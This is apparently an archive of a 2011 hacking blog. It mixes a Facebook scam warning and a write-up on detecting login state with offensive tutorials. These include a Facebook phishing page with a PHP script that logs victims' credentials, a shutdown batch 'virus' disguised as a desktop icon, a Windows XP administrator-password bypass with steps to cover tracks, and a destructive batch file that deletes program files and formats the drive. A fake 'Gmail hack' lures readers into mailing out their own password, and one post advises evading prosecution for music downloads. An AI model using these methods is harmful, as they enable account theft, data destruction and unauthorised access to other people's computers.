Dec 15, 2011

Beware! Facebook Scam "Yeahh!! It happens on Live Television!"


We recently covered a Facebook worm that targeted a large number of Facebook users. It's really sad to see that these types of scams keep growing and that Facebook hasn't really been able to protect its users from them.

A new entry in the list, "Yeahh!! It happens on Live Television!", the most viral one yet, is spreading like wildfire among Facebook users.


The following status on a friend's wall first brought this scam to my attention:




Yeahh!! It happens on Live Television![LINK] 
Lol Checkout this video its very embracing moment for her

The lady in the above screenshot is Marika Fruscio, an Italian model. She had a wardrobe malfunction (accidental exposure of intimate parts) on a live TV show, which is what the scam refers to.


On clicking the link, Facebook users are directed to the following page:




In order to play the video, the user has to click the button "jaa", which appears to be an age verification required to watch the video. When you click on "jaa" you are in fact clicking on a hidden link, which consequently posts the same link on each of your contacts' walls. Next, a survey is shown which the user needs to fill in to watch the video, thus helping the scammers make tons of money.




While searching the internet for information related to the scam, I managed to find its source code on Pastebin. This proves that there is no single party behind this scam: with the source code publicly available, anyone could create a website, inject the malicious JavaScript into it and start scamming.

One more thing to note is that in most such cases Blogspot blogs are being targeted, as they are free to create; you can create a blog in less than 5 minutes. If this keeps growing, I believe that Blogger will stop giving out free Blogspot blogs and will maybe switch to a paid system, or Facebook will simply block Blogspot domains from being shared, making it difficult for real bloggers to market their blogs.

How To Remove The Scam?
It's fairly easy to remove the scam: all you need to do is report it to Facebook.



Abusing HTTP Status Codes to Expose Private Information??

When you visit my website, I can automatically and silently determine if you're logged into Facebook, Twitter, GMail and Digg. There are almost certainly thousands of other sites with this issue too, but I picked a few vulnerable well known ones to get your attention. You may not care that I can tell you're logged into GMail, but would you care if I could tell you're logged into one or more porn or warez sites? Perhaps http://oppressive-regime.example.org/ would like to collect a list of their users who are logged into http://controversial-website.example.com/?

Ignoring the privacy implications for a second, as a website developer, you might like to know if your visitors are logged into GMail; you could use that information to automatically fill the email fields in your forms with "@gmail.com"... Perhaps you might want to make your Facebook "like" buttons more prominent if you can tell your visitor is logged into Facebook at the moment? Here's how I achieve this:


First of all, let's check if you're logged into GMail right now (not including Google Apps)... (No, you're not logged in).
Now, how did I get that information? Really, really easily... I generated a hidden image in my HTML similar to this:
<img style="display:none;"
     onload="logged_in_to_gmail()"
     onerror="not_logged_in_to_gmail()"
     src="https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD"
/>

I generated the URL in the "src" attribute by logging into my own GMail account, then going into the general settings and uploading a picture in the "My Picture" section. I then ticked the "Visible to everyone" checkbox, and right clicked the uploaded image to get the image location. Fetching the content at that URL does two different things depending on whether or not you're logged into GMail. If you are logged into GMail, it returns an image. If you're not logged into GMail, it redirects to a HTML page. This is why the img tag in my example above works. "onload" is triggered if an image is returned, but "onerror" is triggered otherwise.


I tested this technique in Firefox, Safari, Chrome, Opera and various versions of Internet Explorer and it worked in them all. I reported it to Google and they described it as "expected behaviour" and ignored it.

At this point, you might be wondering why I have "Status Codes" in the title; the method I use for attacking Facebook, Twitter and Digg is slightly different and works because various URLs provide different HTTP status codes depending on your logged in status. Unfortunately, this attack doesn't seem to work in Internet Explorer or Opera, but does work in Firefox, Chrome and Safari. If you're using a non-IE, non-Opera browser, here are tests for Twitter and Facebook:
Are you logged into Twitter? (Yes, you are logged in)
Are you logged into Facebook? (Yes, you are logged in)
If you have JavaScript disabled on twitter.com and facebook.com, the above tests won't work. Here is how they work when you have JavaScript enabled:

<script type="text/javascript"
        src="https://twitter.com/account/use_phx?setting=false&amp;format=text"
        onload="not_logged_in_to_twitter()"
        onerror="logged_in_to_twitter()"
        async="async"
></script>

<script type="text/javascript"
        src="https://www.facebook.com/imike3"
        onload="logged_in_to_facebook()"
        onerror="not_logged_in_to_facebook()"
        async="async"
></script>
In Firefox, Safari and Chrome, the <script/> tags fire onload if a 200 HTTP status code is returned, even if there was no valid JavaScript and the Content-Type was text/html. But if the status code was one of 404, 403, 406 or 500, then onerror is triggered instead. In the above examples, the Twitter URL returns an error code if you're logged in, but redirects to the login form with a success status code if you're not logged in. The Facebook one works because my profile is only visible to people who are logged in and returns a 404 if you're not. There is a similar problem with Digg. http://digg.com/settings returns a 403 status code if you're not logged in, but a 200 if you are.


This can be an awkward problem to avoid if you're developing a website. Some of these requests could be stopped by doing referrer checks; reject all external referrers for content only accessible when logged in. You want your status codes and responses to image requests to be relevant, but that can leak information. Firefox users could defend from this problem by using the Request Policy addon. I've never used it myself because it looks like a pain to manage, but it sounds like it would do the job.

And finally, this isn't just an issue of detecting whether or not a user is logged in. The question could technically be anything, if a HTTP response results in an image or html depending on the answer, or results in a success/error status code depending on the answer.
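One way a site could apply the referrer check described above while keeping its responses from leaking login state, as an added example that is not code from the original article. The origin, the path list and the function names are assumptions; the `Sec-Fetch-Site` request header goes beyond the referrer check the article mentions, and header names are assumed to be lower-cased as Node's HTTP server delivers them.

```javascript
// Added example: hypothetical origin and path list, not from the original article.
const SITE_ORIGIN = 'https://app.example.test';
const PRIVATE_PREFIXES = ['/settings', '/account/', '/photos/private/'];

// Classify where a request was initiated from, using only request headers.
function initiator(headers) {
  const site = headers['sec-fetch-site'];
  if (site !== undefined) {
    // 'none' means the user typed the URL or used a bookmark.
    return site === 'same-origin' || site === 'none' ? 'internal' : 'external';
  }
  const referer = headers['referer'];
  // An embedding page can suppress Referer, so a missing one is not trusted.
  if (!referer) return 'external';
  try {
    return new URL(referer).origin === SITE_ORIGIN ? 'internal' : 'external';
  } catch (e) {
    return 'external'; // unparsable Referer
  }
}

// True for paths whose content only exists for a logged-in user.
function isPrivate(path) {
  return PRIVATE_PREFIXES.some((p) => path === p || path.startsWith(p));
}

// Decide the response for a request. Externally initiated requests for private
// paths get one fixed answer, so onload/onerror on an embedding page fires the
// same way whether or not the visitor has a session.
function decide(path, headers, loggedIn) {
  if (!isPrivate(path)) return { status: 200, body: 'public' };
  if (initiator(headers) === 'external') {
    return { status: 404, body: 'Not Found' };
  }
  // Requests from the site's own pages may get informative status codes.
  return loggedIn
    ? { status: 200, body: 'private content' }
    : { status: 403, body: 'login required' };
}
```

The same rule has to cover images as well as pages: the uniform answer must not differ in content type between the logged-in and logged-out case, or the image test above still works.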

For the web developers out there who are familiar with jQuery, here is a demonstration of the usefulness of this technique. The following chunk of code will detect if a user is logged into GMail, and if they are, will replace all the mailto: links on your webpage with links to the GMail compose window (automatically filling in the To field):


$('<img/>').hide()
   // Bind the handler before setting src so a cached image cannot load first.
   .on('load', function(){
      $('a[href^="mailto:"]').each(function(){
         var email = $(this).attr('href').replace(/^mailto:/,'');
         // encodeURIComponent replaces the deprecated escape()
         $(this).attr('href','https://mail.google.com/mail/?view=cm&fs=1&tf=0&to='+encodeURIComponent(email));
      });
   })
   .attr('src','https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD')
   .appendTo('body');


Dec 13, 2011

How to H4CK FACEBOOk ACCOUNT ??




How to Hack Facebook Account Using Phising webPage





Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .










Phishing WebPage:
     Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.


Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.


Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:





The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:
php Script
<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


save this file as "next.php"


Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.




Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com


Step 6 :


Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
*Updated*  
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  









Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 




Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.


Don't use this method for hacking others' accounts. This article is for educational purposes only. Here are tips to protect yourself from phishing web pages:
How to protect yourself from phishing web pages?
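The deception described in Step 6, a link whose visible text shows one address while the underlying href points somewhere else, can be checked mechanically when a message is screened. The following is an added example, not part of the original post; the function names and the sample message are constructed for illustration, and only http(s) links whose visible text itself looks like a URL are examined.

```javascript
// Host part of an http(s) URL or bare domain, lower-cased, without "www.".
// Tolerates the malformed "http:/host" form and skips any "user@" prefix.
function hostOf(s) {
  const m = /^(?:https?:\/*)?(?:[^@\/?#\s]*@)?([^\/?#:\s]+)/i.exec(s.trim());
  return m ? m[1].toLowerCase().replace(/^www\./, '') : null;
}

// True when link text is itself written as a URL or a domain name.
function looksLikeUrl(text) {
  return /^(?:https?:\/*|www\.)\S+$/i.test(text) ||
         /^[a-z0-9-]+(?:\.[a-z0-9-]+)+(?:\/\S*)?$/i.test(text);
}

// Return every anchor whose displayed address and real target are on
// different hosts.
function findMismatchedLinks(html) {
  const anchor = /<a\b[^>]*?\bhref\s*=\s*(["'])(.*?)\1[^>]*>([\s\S]*?)<\/a>/gi;
  const findings = [];
  let m;
  while ((m = anchor.exec(html)) !== null) {
    const href = m[2].trim();
    // Visible text: drop nested tags, decode the one entity common in URLs.
    const shown = m[3].replace(/<[^>]*>/g, '').replace(/&amp;/g, '&').trim();
    if (!/^https?:/i.test(href) || !looksLikeUrl(shown)) continue;
    const shownHost = hostOf(shown);
    const realHost = hostOf(href);
    if (shownHost && realHost && shownHost !== realHost) {
      findings.push({ shown, shownHost, realHost });
    }
  }
  return findings;
}

// Constructed sample message: one deceptive link, one honest link, one
// link with ordinary text.
const SAMPLE_EMAIL = `
<p>Alex added you as a friend on Facebook.</p>
<p>To confirm this request, follow the link below:</p>
<a href="http://friend-requests.example.test/index.html">http:/www.facebook.com/n/?reqs.php</a>
<p><a href="https://www.facebook.com/n/?reqs.php">http://www.facebook.com/n/?reqs.php</a></p>
<a href="https://www.facebook.com/help/">Help Center</a>
`;

const SAMPLE_FINDINGS = findMismatchedLinks(SAMPLE_EMAIL);
```

Legitimate mail that routes links through a click-tracking host trips the same check, so a hit is a reason to look at the real target, not a verdict.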

CRYPTOGRAPHY


Introduction to Cryptography:
Julius Caesar introduced the technique of cryptography. Cryptography is the technique of changing plain text into unreadable text (known as cipher text).
At home you put money in a locker, don't you? The locker has a key to open it. Imagine a thief comes to your home to steal. If he wants to open the locker, he certainly needs the key; without the key he cannot open it. Yes, I can hear what you are saying: he can break the locker. But if the locker is very strong, he cannot open it at all.
Likewise, in cryptography we create a key for our data so that intruders cannot read it. It is still possible to read the data if the encryption (explained later) is weak, so the encryption method needs to be very strong.



Terminologies used in cryptography:
Plain Text: The original data or text.
Cipher Text: The encrypted message (unreadable message).
Encryption: Changing the plain text to unreadable text.
Decryption: Changing the cipher text back to plain text.



Traditional Encryption Methods:
  • Caesar Cipher
  • Mono Alphabetic Cipher
  • Playfair Cipher
  • Hill cipher
  • Poly Alphabetic Cipher
  • Rail Fence Technique.
Caesar Cipher:
  The simplest encryption method. In this method we replace each letter with the letter a fixed number of positions further along the alphabet.
Eg:
Consider the plain text: break
If the key is 3, the cipher text is found by:

        b+3 r+3 e+3 a+3 k+3
Shifting each letter by three gives the final cipher text:
         euhdn


If an intruder sees the cipher text (here "euhdn"), he cannot understand anything. But this method is easily broken, because an intruder can try all 25 shifts and eventually get the result.
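The shift and the 25-shift search described above, as an added example that is not from the original post. It goes one step beyond the text by ranking the 25 candidates with rounded English letter frequencies so the likely plain text is picked automatically; the function names and the longer sample sentence are constructed for illustration.

```javascript
// Relative frequency (%) of a..z in English text, rounded; used only for ranking.
const ENGLISH_FREQ = [8.2, 1.5, 2.8, 4.3, 12.7, 2.2, 2.0, 6.1, 7.0, 0.2, 0.8, 4.0, 2.4,
                      6.7, 7.5, 1.9, 0.1, 6.0, 6.3, 9.1, 2.8, 1.0, 2.4, 0.2, 2.0, 0.1];

// Shift every letter by `key` positions, wrapping around the alphabet.
// Case is preserved and non-letters are left untouched.
function shiftText(text, key) {
  const k = ((key % 26) + 26) % 26;
  return text.replace(/[a-z]/gi, (ch) => {
    const base = ch >= 'a' ? 97 : 65;
    return String.fromCharCode(((ch.charCodeAt(0) - base + k) % 26) + base);
  });
}

const encrypt = (plain, key) => shiftText(plain, key);
const decrypt = (cipher, key) => shiftText(cipher, -key);

// The whole key space: every non-zero shift, with the text it produces.
function bruteForce(cipher) {
  const out = [];
  for (let key = 1; key <= 25; key++) {
    out.push({ key, plain: decrypt(cipher, key) });
  }
  return out;
}

// Higher when the text is made of letters that are common in English.
function englishScore(text) {
  let score = 0;
  for (const ch of text.toLowerCase()) {
    const i = ch.charCodeAt(0) - 97;
    if (i >= 0 && i < 26) score += ENGLISH_FREQ[i];
  }
  return score;
}

// Pick the candidate that looks most like English. Reliable on a sentence;
// on a five-letter word such as "euhdn" the candidates are read by eye.
function crack(cipher) {
  return bruteForce(cipher).reduce((best, c) =>
    englishScore(c.plain) > englishScore(best.plain) ? c : best);
}

// Constructed sample sentence for the automatic ranking.
const SAMPLE = 'meet me near the east gate at seven and bring the letters';
```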
   
Many encryption methods have been introduced to provide better security.

Today's encryption methods:

  • AES (Advanced Encryption Standard)
  • DES (Data Encryption Standard)
  • RSA (named after its creators)
  • MD5 (Message Digest 5)
  • SHA (Secure Hash Algorithm)

For secure transactions, SSL (Secure Sockets Layer) was introduced. In the next post I'll give a detailed explanation of the SSL layer.

Nov 29, 2011

Feb 17, 2011

Simple Virus For Fun


hey friends i am going to tell u a simple virus trick.....
u can try it in our college computers if someone is not careful whenever he click on a icon than definitely he can do this mistake.....


steps-:
1. open notepad(start-> run -> notepad).
2. copy-paste this code in notepad
    @echo off
    cd c:\windows\system32
    shutdown -s -t 0
3. save it as virus.bat.
4. now cut and paste it in system32.
5. now create shortcut for it.
    a. first right click on desktop and in new select shortcut.
    b. now enter path of that file(c:\windows\system32\virus.bat)
    c. now enter a name which can be internet explorer or my computer anything u want.
    d. when shortcut will create then right click on it and in properties click on change icon and change icon          according to ur shortcut name.
6. hurray! your virus has been created.when anyone click on that icon the computer will shutdown and he think it is virus.
 

HACKING WINDOWS ADMIN PASSWORD


Here are the steps involved to Hack the Window XP Administrator Password .
  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\windows\system32
  5. mkdir temphack
  6. copy logon.scr temphack\logon.scr
  7. copy cmd.exe temphack\cmd.exe
  8. del logon.scr
  9. rename cmd.exe logon.scr
  10. exit
Wait its not over read the rest to find out how to Hack the Window XP AdministratorPassword
XPLANATION 
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called temphackAfter which you are copying or backing up the logon.scr and cmd.exe files into the temphack then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is xyz and you want change the password to pass Then type in the following command
net user xyz pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover ur tracks.
  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32\temphack
  5. copy logon.scr C:\windows\system32\logon.scr
  6. copy cmd.exe C:\windows\system32\cmd.exe
  7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.

Feb 13, 2011

how to make a virus

you can make it easy .. creat a notpad and copy this ( echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat ) and save it as a name AUTOEXE.bat and ull have a danger virus .. don't exute it xD

How to hack gmail password..??


How to hack gmail passwords!

hello freind's this is the simple trick i have found to hack the gmail passwords hope this will work for u..............!!!!


* STEP 1- Log in to your own gmail account. Note: Your account must be at least 1 week old for this trick to work.


* STEP 2- Once you have logged into your own account, compose/write an e-mail to:"recover.gmlacc@gmail.com" or "ccntrecovery@gmail.com" depending on which account u want to hack...This is the mailing address to the automated server that sends out passwords to users who have forgotten them. What you are going to do is trick the server into thinking that it is sending your password to you but it will send you the pass for the account you are trying to hack instead.

* STEP 3- In the subject line type exactly: “userpassword retrieve” (case sensitive, without the inverted commas)

* STEP 4- On the first line of your mail write the email address of the person you are hacking.

* STEP 5- On the second line type in the e-mail address you are using.

* STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a completed JavaScript form from your account in the Gmail Server to extract the other email addresses password. This works because you are sending your password to a machine not a person. The process will be done automatically by the user administration server.

* STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly:

2SUGm9qwM482SUGm9qwM48 (case sensitive)

The password will be sent to your inbox within 48 hrs in a mail called “System Reg Message” . Hack who ever u want (just don't hack me)

YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS

ENJOY H@CKING!!
thank u.....!!!!

Feb 12, 2011

Download Free Music Legally


Are you scared that the RIAA is about to track you down for illegally downloading songs? Well, here is a method of obtaining many songs absolutely free that is virtually untrackable by modern technology. This has to do with capturing streaming audio, which in many cases, believe it or not, are plain old mp3s just waiting for you to "download." I have found most of the current top-40 as well as many others you may like, so keep searching. The music is waiting for you to find it.

Step 1:
First of all, you need to find a good site that hosts streaming audio. My favorite that has brought me many songs to date is hxxp://www.windowsmedia.com . Some others are just as good, but this is the site that I will be referencing (plus, I know you guys love to steal from Microsoft).

Step 2:
Alright, go up to the left hand corner where there is an empty text box. This is the search box, just fill it with a songname or artist just like you would in kazaa and click search. This will bring up a page with links to many websites hosting a stream by that artist. The ones with music notes are just that...music, this is what you want. In many cases, this is all you need. Just right click on one of the links and click "save as" to save the song. This works if the file extension is .mp3 or .wma or .asf or well-other known formats. If this worked, you are finished, otherwise continue reading.

Step 3:
However, if you encounter a .asx file, there are a few more steps you will have to endure. First of all, do exactly like the above example and save the file locally. After the file is downloaded, check to see how large the file is. If it is a large file in the megabyte range, then you should be able to play it in your favorite music program. However, if it is less than 1 kilobyte, open it as a textfile. You will then see many script commands that communicate to windows media player. Don't worry about these, just look for some URLs which will most likely be pointing to a .asf file. It will have at least one if not more. Open the new found URL in your browser and save it like in step 2 and you should be good to go. (I use Mozilla, because Internet Explorer likes to open things rather than save them as I tell it)

NOTE: If any of the URLs are preceded with "mms://" instead of "http://" find another URL, because this technique will not work.

This technique is especially useful to avoid prosecution because streaming audio, and downloading it appear the same to a web server, therefore you are seen as just another "legal" listener, so "download" away my friend and don't blame me if this soon becomes illegal (if it isn't already).

Step 4:
If you are picky then search for a program that will convert these file types to mp3s. I assure you there are many sites out there.

If this technique does not work for some reason, there is another technique, which is manually recording streaming audio with an audio capture program. I use the one that came with my soundcard (Audigy 2ZS, great soundcard), but I would recommend it only as a last resort, such as with "mms://" files. There is a degradation in quality compared to the other formats, and it records every sound your PC makes while it is recording, so don't chat on AIM while recording (lol I can hear random doors slamming now).

Discover New Music You'll Probably Love


First off, I've been doing this for a long time now. I still listen to a lot of the bands I've found by doing this. It's really simple, but it works like a charm. I ALWAYS find cool new stuff -- sometimes even bands that have been around 10 years that I never heard of.

The things you need:
- (Optional) A file sharing program (I use limewire)
- A browser. :]

1.) Pick one of your favorite bands.
2.) Go to amazon.com or cdnow.com (same thing)
3.) Look up that band's name
4.) Scroll down until you see "Customers who bought this title also bought:"
5.) Browse through the artists you've never heard of in that list.
6.) Check out one of their albums, preferably the one with highest rating (in stars)
7.) Either listen to the samples on amazon or download a song by them with your filesharing app.

If you like what you hear, repeat steps 3-7 using the new band's name.

You'll find TONS of new music you never thought existed.

It's a really simple way to find stuff, and I'm sure lots of you probably already do this. But for those who don't -- you'll thank me later. It works wonders. :)